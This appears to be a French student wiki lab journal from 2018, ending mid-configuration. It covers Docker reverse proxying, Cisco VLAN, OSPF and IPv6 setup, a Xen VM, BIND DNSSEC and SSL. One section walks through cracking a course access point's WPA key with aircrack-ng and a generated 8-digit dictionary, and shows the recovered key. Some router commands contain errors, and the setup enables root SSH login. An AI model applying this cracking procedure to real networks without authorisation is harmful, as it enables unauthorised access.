Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
